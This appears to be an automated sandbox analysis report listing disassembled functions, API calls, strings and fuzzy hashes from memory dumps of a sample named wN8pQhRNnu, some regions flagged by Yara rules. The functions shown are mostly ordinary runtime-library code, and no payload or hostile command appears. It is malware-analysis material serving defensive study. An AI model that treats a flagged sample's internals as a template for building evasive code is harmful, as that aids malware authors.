Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: 8dc18062fd9b7cdba8f2f580983486f902d54a21e93f80d3fddfda5678792448
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: F001A735511155ABD720FF66EC48FAF3B68AF42F52B50042BF815F2160DBA4D9048AA8

Function 024824A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0248670B), ref: 024824B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024824C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024824D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0248670B), ref: 02482500
GetProcAddress.KERNEL32(00000000), ref: 02482507
GetLastError.KERNEL32(?,?,?,0248670B), ref: 02482522
GetLastError.KERNEL32(?,?,?,0248670B), ref: 0248252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02482544
__CxxThrowException@8.LIBVCRUNTIME ref: 02482552

Strings

kernel32.dll, xrefs: 024824B0, 024824B5, 024824FA

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: 6321cb032b3ac6266bcb91948c46b14e9a90c03f5cc25f99a1529d2fb501224a
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: E6F086759103503FB7117B75AD9991F3FEDDD46A22310062BF811E2291EBB585018558

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

ios_base::eofbit set, xrefs: 0040C649
F(@, xrefs: 0040C651
ios_base::failbit set, xrefs: 0040C644
ios_base::badbit set, xrefs: 0040C63A, 0040C65A
F(@, xrefs: 0040C61B

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 024A239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024A25EC,00000001,00000001,?), ref: 024A23F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024A25EC,00000001,00000001,?,?,?,?), ref: 024A247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024A2575
__freea.LIBCMT ref: 024A2582

Part of subcall function 024A390E: RtlAllocateHeap.NTDLL(00000000,0247DAD7,00000000), ref: 024A3940

__freea.LIBCMT ref: 024A258B
__freea.LIBCMT ref: 024A25B0

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: 40e7b135655f72d68db524e9ecd5f702624e90b039579bb94eea031907e1d748
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: CA510472A00216ABDB29CF64CC70EBF77AAFB64714F154A2AFC04D6240DBB4DD41EA50

Function 0249E419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0249E445
__cftoe.LIBCMT ref: 0249E477

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: b09589567857bce42739b3ca8f4f7854c34ce075a3fd7c49df6bd92b9c8ab05f
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 8851E732A00205ABDF24DFA98C44BAF7FA9EF49774F14426FE81596281EB31D9418A64

Function 0249302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02493051

Part of subcall function 02488AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02488ABD

SafeSQueue.LIBCONCRT ref: 0249306A
Concurrency::location::_Assign.LIBCMT ref: 0249312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0249314B
__CxxThrowException@8.LIBVCRUNTIME ref: 02493159

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: f17f68f332ad765b17bc766c602b2384a19cf259f4d76f71caa23b54ebd08521
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 9B31FD31A00A119FCF25EF69C884AAEBFB1EF45710F00859ED80A8B291DB70E845CFC0

Function 02475437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0247544B
__Mtx_init.LIBCPMT ref: 02475471
std::_Cnd_initX.LIBCPMT ref: 02475494
__Thrd_start.LIBCPMT ref: 024754B9
std::_Cnd_waitX.LIBCPMT ref: 024754D9
std::_Cnd_initX.LIBCPMT ref: 02475506

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: 3533dc5d6fe9fe7f8d82f7bc90c6bf1722336b93d829ce2b177027cd31e7d937
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: EE218071C14248AADF15EBB9D844BDEB7F9AF08315F24402FE524B7280DB749A448E75

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,98747357), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,98747357), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 02499041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 0249904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0249905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02499076
SetLastError.KERNEL32(00000000,?,02499038,024969C9,024B0907,00000008,024B0C6C,?,?,?,?,02493CB2,?,?,0045A064), ref: 024990C8

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 79e7b528f51af78aa9cb549d269dbed359ca619351dc98132f4f19895471d8bc
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3201A7322097216EBF242BB6BC88A6B2F55EB06776B30033FF530453E1EF1288555D99

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 02474FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02474FCA
int.LIBCPMT ref: 02474FE1

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 02474FEA
std::_Facet_Register.LIBCPMT ref: 0247501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02475031
__CxxThrowException@8.LIBVCRUNTIME ref: 0247504F

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: c6852b834db11fb5e4047f026c8ffd8bac5ebc5a9f69090eb6e9b8e97eec28b3
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: 3E11AC319002289BCB25EBA5D844AEE77B6AF04714F54055FE832AB290DB749A068FE0

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040559F
std::_Facet_Register.LIBCPMT ref: 004055D0
std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
__CxxThrowException@8.LIBVCRUNTIME ref: 00405604

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C

Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
int.LIBCPMT ref: 00404C3C

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404C45
std::_Facet_Register.LIBCPMT ref: 00404C76
std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
__CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98

Function 0247C3F0 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0247C401
int.LIBCPMT ref: 0247C418

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 0247C421
std::_Facet_Register.LIBCPMT ref: 0247C452
std::_Lockit::~_Lockit.LIBCPMT ref: 0247C468
__CxxThrowException@8.LIBVCRUNTIME ref: 0247C486

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: 7fde380ba2433709925aa48cbce426dcd8f5b3fb0bad4bf98aea0e4913c3a21a
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: 5811A1719002289BCF15FBA5D884AEE7B76AF45714F14052FE821BB290DF749A05CFA4

Function 02474E7B Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02474E8C
int.LIBCPMT ref: 02474EA3

Part of subcall function 0247BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0247BFD4
Part of subcall function 0247BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0247BFEE

std::locale::_Getfacet.LIBCPMT ref: 02474EAC
std::_Facet_Register.LIBCPMT ref: 02474EDD
std::_Lockit::~_Lockit.LIBCPMT ref: 02474EF3
__CxxThrowException@8.LIBVCRUNTIME ref: 02474F11

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction ID: 5cec8dc9ef8baebea86ba37eeaa29eb09289fa26feddf74ed473df9f2c5ccc89
Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
Instruction Fuzzy Hash: 4A11A131D00229DBCF15EBA5D844AEE77B6AF44724F14051FE421BB2A0DF749A05CFA5

Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00404E6A

Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
__Getcoll.LIBCPMT ref: 00404EC4
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4

Strings

fJ@, xrefs: 00404EBE

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID: fJ@
API String ID: 1836011271-3478227103
Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99

Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A

Strings

mscoree.dll, xrefs: 0042FEFD
CorExitProcess, xrefs: 0042FF0F

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C

Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
__CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66

Strings

pScheduler, xrefs: 0041CE50

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 3657713681-923244539
Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D

Function 024B08F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 024B08F8
make_shared.LIBCPMT ref: 024B0943

Strings

MOC, xrefs: 024B091B
v)D, xrefs: 024B08F3
RCC, xrefs: 024B092A

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchmake_shared
String ID: MOC$RCC$v)D
API String ID: 3472968176-3108830043
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: bfd7818decd64fa599f9f57c8d04e82935a596c9ca942e64c5762841d71a1ba5
